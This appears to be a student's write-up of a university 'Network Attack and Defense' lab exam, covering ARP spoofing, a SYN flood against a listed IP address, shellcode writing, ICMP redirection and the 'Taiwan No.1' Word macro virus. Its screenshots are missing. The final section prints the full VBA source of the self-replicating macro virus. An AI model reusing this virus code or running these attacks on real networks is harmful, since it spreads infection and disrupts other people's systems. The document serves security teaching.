《网络攻击与防御》课程机考试题

《网络攻击与防御》课程机考试题

机考要求：
1.考试时间内完成所有实验考核内容；
2.需完整实验并记录下实验过程；
3.考试时间120分钟；
4.满分100分，每题20分。

一、利用Netwag或类似工具进行ARP欺骗攻击，并利用Wireshark捕获相关网络数据。

这里使用的是kali工具：ettercap，三台机器，一台服务器，一台客户端，一台攻击机，kali当作攻击机，windowsxp当作客户端，windows2003当作服务端。
首先搭好服务器：

然后客户端访问：

打开kali的工具ettercap，查找主机，找到两个：

配置好之后，在客户端输入123，密码123，kali进行查看到账户密码，欺骗成功：

二、利用Netwag或类似工具进行DDOS攻击，并利用Wireshark捕获相关网络数据。

这里用的是SYN Floor攻击，SYN Flood是当前最流行的DoS与DDoS的攻击方式之一。
netwag选择76号，输入SYN flood攻击的目标ip和端口，这里使用的IP：122.13.75.80：


运行之后输入过滤规则，方便查看：ip.src122.13.75.80 or ip.dst122.13.75.80，结果如下：

三、请编写一段Shellcode，并将实验过程及结果详细记录下来。

运行一个代码：

下断点，然后查看汇编代码：

记录下地址，然后查看内存：

这是真实地址：

编写汇编程序，运行得到：

下断点，调式：

查看汇编代码：

查看内存，复制如下数值：

然后这个数值就是shellcode，编写如下代码：

运行之后也能弹出窗口：

四、利用Netwag或类似工具进行ICMP重定向攻击，并利用Wireshark捕获相关网络数据。

打开Netwag软件找到86：

在newgateway填写自己的ip地址，使自己ip伪造成路由器：

攻击结果如下：

五、利用“台湾一号”宏病毒进行实验性攻击，并将实验过程及结果详细记录下来。

打开word2003，修改设置，工具->宏->安全性->安全性选择最低


点击确定！然后alt+F11进入编辑界面，在对应的地方输入宏代码，然后保存：

修改时间日期为1号，然后双击打开文档，出现如下界面：

输入正确的答案得到，错误则会显示很多的word文档，结束进程即可关闭：

台湾一号宏代码：

'moonlight
Dim nm(4)
Sub Document_Open()
'DisableInput 1

Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule


Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
    Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
With host
If .Lines(1, 1) <> "'moonlight" Then
    
    .DeleteLines 1, .CountOfLines
.InsertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 3, "Sub Document_Close()"
    If ThisDocument = NormalTemplate Then
        .ReplaceLine 3, "Sub Document_Open()"
        ActiveDocument.SaveAs ActiveDocument.FullName
    End If
    
End If

End With

Count = 0
If Day(Now()) = 1 Then
try:
        On Error GoTo try
        test = -1
        con = 1
        tog$ = ""
        i = 0
        While test = -1
            For i = 0 To 4
                nm(i) = Int(Rnd() * 10)
                con = con * nm(i)
                If i = 4 Then
                    tog$ = tog$ + Str$(nm(4)) + "=?"
                    GoTo beg
                End If
                tog$ = tog$ + Str$(nm(i)) + "*"
            Next i
beg:
        Beep
        ans$ = InputBox$("今天是" + Date$ + ",跟你玩一个心算游戏" + Chr$(13) + "若你答错，只好接受震撼教育......" + Chr$(13) + tog$, "台湾NO.1 Macro Virus")
        If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) Then
            Documents.Add
            Selection.Paragraphs.Alignment = wdAlignParagraphCenter
            Beep
            With Selection.Font
                .Name = "细明体"
                .Size = 16
                .Bold = 1
                .Underline = 1
            End With
            Selection.InsertAfter Text:="何谓宏病毒"
            Selection.InsertParagraphAfter
            Beep
            Selection.InsertAfter Text:="答案："
            Selection.Font.Italic = 1
            Selection.InsertAfter Text:="我就是......"
            Selection.InsertParagraphAfter
            Selection.InsertParagraphAfter
            Selection.Font.Italic = 0
            Beep
            Selection.InsertAfter Text:="如何预防宏病毒"
            Selection.InsertParagraphAfter
            Beep
            Selection.InsertAfter Text:="答案："
            Selection.Font.Italic = 1
            Selection.InsertAfter Text:="不要看我......"
            GoTo out
            Else
                Count = Count + 1
                For j = 1 To 20
                    Beep
                    Documents.Add
                Next j
            Selection.Paragraphs.Alignment = wdAlignParagraphCenter
            Selection.InsertAfter Text:="宏病毒"
            If Count = 2 Then GoTo out
            GoTo try
        End If
Wend
End If
out:
End Sub